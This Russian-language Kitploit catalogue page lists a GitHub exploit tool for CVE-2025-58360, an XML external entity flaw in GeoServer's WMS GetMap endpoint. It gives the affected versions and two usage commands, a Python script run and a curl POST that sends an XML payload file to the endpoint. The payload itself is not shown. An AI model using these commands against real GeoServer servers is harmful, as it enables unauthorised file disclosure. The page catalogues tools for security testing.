Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-58360 — XXE через конкретный эндпоинт /geoserver/wms операция GetMap - Geoserver | Kitploit
Инструменты/GitHubGitHub/quyenheu/cve-2025-58360
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubquyenheu/cve-2025-58360

CVE-2025-58360

XXE через конкретный эндпоинт /geoserver/wms операция GetMap - Geoserver

Репозиторий
659 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58360

Начиная с версии 2.26.0 и до версии 2.26.2 (не включая её), а также до версии 2.25.6 (не включая её), была выявлена уязвимость XML External Entity (XXE). Приложение принимает XML-ввод через конкретную конечную точку /geoserver/wms (операция GetMap).

image

Эксплойт 1:

python3 CVE-2025-58360 -u http://example.com

Эксплойт 2:

curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png
Скачать инструмент